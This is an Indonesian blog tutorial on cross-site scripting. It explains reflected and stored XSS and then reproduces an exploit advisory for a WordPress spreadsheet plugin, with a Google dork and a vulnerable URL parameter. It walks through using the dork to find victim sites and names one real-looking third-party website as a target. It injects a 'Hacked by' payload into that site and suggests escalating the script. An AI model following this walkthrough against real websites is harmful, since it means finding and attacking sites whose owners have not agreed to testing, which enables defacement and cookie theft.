XSS (Cross Site Scripting)

XSS atau Cross Site Scripting adalah jenis serangan yang dilakukan dengan cara memasukkan kode atau script ke dalam sebuah website dan hasilnya akan dijalankan melalui browser di client.

Secara umum XSS ada 2 macam, yaitu XSS tidak permanen dan XSS permanen (stored XSS). XSS yang tidak permanen berarti ketika halaman direload, maka tampilan akan normal seperti semula. Sedangkan XSS permanen (stored XSS) adalah perubahan tampilan yang masih ada meskipun halaman direload maupun halaman tersebut diakses oleh user lain. Contoh sederhana penyerangan XSS melalui browser:

http://vulnerableweb.com/index.php?search=[script_xss]

Script yang bisa digunakan dalam serangan XSS ini adalah HTML, Javascript, VBscript, Active X, Flash.

Script yang dikirim melalui XSS dapat digunakan untuk mengubah tampilan website, mengakses cookies, dan mendapatkan informasi sensitif lainnya tentang website melalui browser.

Oke, kita akan mencoba menyerang sebuah website dengan exploit XSS dibawah ini.

#********************************************************************************

# Exploit Title : Wordpress spreadsheet Plugin Cross site scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org

# Software Link : http://downloads.wordpress.org/plugin/dhtmlxspreadsheet.2.0.zip

# Google Dork : inurl:wp-content/plugins/dhtmlxspreadsheet

# Date: 2013/10/18

# Tested on: Windows 7 , Linux

-------------------------------------------------------------------

# Cross site scripting

#

# Exploit :

#http://[target]/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=[xss]

# Script For Test XSS : <marquee><h1>Hacked by security tester</h1></marquee>

##########################################################################

discovered by : ACC3SS

##########################################################################

Dari exploit diatas kita bisa mendapatkan beberapa informasi penting, yaitu dork (buat nyari target), exploit / PoC (buat menyerang kelemahan web), dan contoh script yang bisa kita pakai.

1. Pertama-tama kita cari target dulu di google dengan bantuan google dork diatas, yaitu inurl:wp-content/plugins/dhtmlxspreadsheet seperti gambar dibawah ini.

2. Misal kita mendapatkan target www.artsarben.com.

3. Sekarang masukan P.o.C untuk menyerang sesuai exploit diatas di belakang URL target. Yaitu

/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=

4. Saatnya memasukkan script untuk. Misal kita akan gunakan <h1>Hacked by security tester </h1>

5. Hasilnya seperti ini.

6. Biar lebih greget, kita tambah scriptnya. Hehehe.

Exploit XSS lainnya buat percobaan.

• http://www.exploit-db.com/exploits/10789/
• http://www.exploit-db.com/exploits/18599/
• http://www.exploit-db.com/exploits/10736/
• http://www.exploit-db.com/exploits/11558/

Referensi tentang XSS lainnya:

• http://ezine.echo.or.id/ezine8/ez-r08-mrt-eksploitasi_web_dg_XSS.txt
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• http://en.wikipedia.org/wiki/Cross-site_scripting

sumber:http://invisible-404.blogspot.com/2014/04/xss-cross-site-scripting_21.html